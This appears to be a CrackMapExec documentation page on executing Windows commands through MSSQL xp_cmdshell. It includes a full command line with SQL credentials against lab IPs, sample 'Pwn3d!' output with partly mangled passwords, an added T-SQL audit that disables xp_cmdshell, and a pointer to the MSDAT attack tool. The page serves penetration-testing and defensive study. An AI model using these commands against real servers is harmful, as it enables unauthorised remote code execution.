Windows command
Execute Windows command using CrackMapExec

Execute Windows Command

This option uses xp_cmdshell to execute a command on the remote host.

#~ cme mssql 10.10.10.59 -u sa -p 'GWE3V65#[email protected]' --local-auth -x whoami
MSSQL 10.10.10.59 1433 None [+] sa:GWE3V65#[email protected] (Pwn3d!)
MSSQL 10.10.10.59 1433 None [+] Executed command via mssqlexec
MSSQL 10.10.10.59 1433 None --------------------------------------------------------------------------------
MSSQL 10.10.10.59 1433 None tally\sarah

If the login does not have EXECUTE permission on xp_cmdshell, the server returns a permission error and no command output comes back:

MSSQL 10.10.10.52 1433 None [+] admin:[email protected][email protected]! (Pwn3d!)
MSSQL 10.10.10.52 1433 None [-] ERROR(MANTIS\SQLEXPRESS): Line 1: The EXECUTE permission was denied on the object 'xp_cmdshell', database 'mssqlsystemresource', schema 'sys'.
MSSQL 10.10.10.52 1433 None [+] Executed command via mssqlexec
MSSQL 10.10.10.52 1433 None None
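
The two outcomes above depend on whether xp_cmdshell is enabled and whether the login may execute it. The following T-SQL is an added example, not part of the CrackMapExec documentation, that a database administrator can run to audit and disable that exposure; it assumes a session with sysadmin rights on the instance being reviewed.

```sql
-- Added example: audit and disable xp_cmdshell exposure on a SQL Server instance.
-- Assumption: run by a DBA with sysadmin rights.

-- 1. Is xp_cmdshell enabled? value_in_use = 1 means it can be called right now.
SELECT name, value, value_in_use
FROM sys.configurations
WHERE name = 'xp_cmdshell';

-- 2. Which logins are members of sysadmin? They can run xp_cmdshell whenever
--    it is enabled and can re-enable it themselves, so keep this list short.
SELECT name, type_desc, is_disabled
FROM sys.server_principals
WHERE type IN ('S', 'U', 'G')
  AND IS_SRVROLEMEMBER('sysadmin', name) = 1;

-- 3. Which principals hold an explicit permission on xp_cmdshell?
--    A login with no GRANT here and no sysadmin membership gets the
--    "EXECUTE permission was denied on the object 'xp_cmdshell'" error.
USE master;
SELECT pr.name AS grantee, pe.state_desc, pe.permission_name
FROM sys.database_permissions AS pe
JOIN sys.database_principals AS pr
  ON pr.principal_id = pe.grantee_principal_id
WHERE pe.class = 1
  AND pe.major_id = OBJECT_ID('sys.xp_cmdshell');

-- 4. Disable xp_cmdshell if nothing legitimate depends on it.
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 0;
RECONFIGURE;
EXEC sp_configure 'show advanced options', 0;
RECONFIGURE;
```
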
When playing with MSSQL, you can use the tool MSDAT (Microsoft SQL Database Attacking Tool) from quentinhardy (GitHub: quentinhardy/msdat).